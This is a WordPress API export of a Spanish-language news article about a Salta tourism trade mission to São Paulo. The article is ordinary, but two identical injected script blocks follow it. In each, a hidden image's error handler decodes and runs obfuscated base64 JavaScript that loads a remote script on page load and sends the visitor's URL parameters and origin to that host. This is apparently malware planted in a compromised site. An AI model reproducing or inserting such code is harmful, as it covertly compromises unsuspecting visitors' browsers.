{"id":1941,"date":"2022-12-14T11:49:25","date_gmt":"2022-12-14T14:49:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1941"},"modified":"2025-08-14T00:28:03","modified_gmt":"2025-08-14T03:28:03","slug":"el-destino-salta-integro-una-mision-comercial-en-san-pablo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1941","title":{"rendered":"El destino Salta integr\u00f3 una misi\u00f3n comercial en San Pablo"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#02812b\"><em>El Ministerio de Turismo y Deportes, la filial Salta de Faevyt, junto a Aerol\u00edneas Argentinas participaron en una misi\u00f3n clave para captar turistas del mercado brasilero.<\/em><\/h3>\n\n\n\n<p>Cinco agencias de viaje de Salta, el Tren a las Nubes y el Ministerio de Turismo y Deportes mantuvieron reuniones comerciales en San Pablo (Brasil) para ofrecer el producto Salta en el mercado econ\u00f3mico m\u00e1s importante de Latinoam\u00e9rica y con el cual la provincia tiene conexi\u00f3n directa a trav\u00e9s de Aerol\u00edneas Argentinas.<\/p>\n\n\n\n<p>\u201cSumarnos como provincia a la estrategia de Argentina nos da la oportunidad de seguir el desarrollo en el mercado brasile\u00f1o, que crece en el pa\u00eds y en Salta\u201d, afirm\u00f3 el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;quien encabez\u00f3 la delegaci\u00f3n salte\u00f1a. &nbsp;Las agencias salte\u00f1as que integraron la comitiva fueron Willka Turismo, Aliar \u2013 Monumental, Apacheta, Tastil y Esencial. &nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5217-el-destino-salta-integro-una-mision-comercial-en-san-pablo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5217-el-destino-salta-integro-una-mision-comercial-en-san-pablo.jpg\" alt=\"El destino Salta integr\u00f3 una misi\u00f3n comercial en San Pablo\"\/><\/a><\/figure>\n\n\n\n<p>El ministro Pe\u00f1a acompa\u00f1\u00f3 tambi\u00e9n al ministro de Turismo y Deportes de la Naci\u00f3n&nbsp;<strong>Mat\u00edas Lammens<\/strong>&nbsp;en reuniones con CVC Viagems y Decolar, dos de las agencias mayoristas m\u00e1s grandes del mundo, para potenciar el crecimiento de la demanda de Salta por parte del turista de Brasil.<\/p>\n\n\n\n<p>Por otra parte, la delegaci\u00f3n particip\u00f3 en la presencia del Consulado argentino en Brasil, un evento destinado a agencias de viaje de San Pablo en el cual Aerol\u00edneas Argentinas y con la presencia de Inprotur Argentina, present\u00f3 su oferta de vuelos &nbsp;para 2023 \u201clo que nos permite programar la venta del destino y que el mercado brasilero siga creciendo en Argentina y en la provincia. Es una gran oportunidad para el desarrollo\u201d, indic\u00f3 Pe\u00f1a.<\/p>\n\n\n\n<p>En la presentaci\u00f3n ofici\u00f3 de anfitri\u00f3n el C\u00f3nsul Argentino en San Pablo,&nbsp;<strong>Luis Kreckler&nbsp;<\/strong>y la presentaci\u00f3n estuvo a cargo del director Comercial de Aerol\u00edneas Argentinas, Fabi\u00e1n Lombardo.<\/p>\n\n\n\n<p>La referente regional Salta de Faevyt, L\u00eda Rivella se\u00f1al\u00f3 que \u00abeste tipo de acciones nos lleva definitivamente a impulsar oportunidades de negocio. Anticiparse siempre es una muy buena estrategia. A trabajar por lo que nos interesa a todos; mantener las rutas conquistadas, agregar frecuencias , recuperar la operatividad que ten\u00edamos, conquistar nuevos mercados y mantener el Destino Salta entre los m\u00e1s requeridos, siempre cuidando que sea sostenible, sorprendente y con alto valor agregado\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5218-el-destino-salta-integro-una-mision-comercial-en-san-pablo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5218-el-destino-salta-integro-una-mision-comercial-en-san-pablo.jpg\" alt=\"El destino Salta integr\u00f3 una misi\u00f3n comercial en San Pablo\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-destino-salta-integro-una-mision-comercial-en-san-pablo-86782\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes, la filial Salta de Faevyt, junto a Aerol\u00edneas Argentinas participaron en una misi\u00f3n clave para captar turistas del mercado brasilero. Cinco agencias de viaje de Salta, el Tren a las Nubes y el Ministerio de Turismo y Deportes mantuvieron reuniones comerciales en San Pablo (Brasil) para ofrecer el producto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1942,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-1941","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1941"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1941"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1941\/revisions"}],"predecessor-version":[{"id":7244,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1941\/revisions\/7244"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1942"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}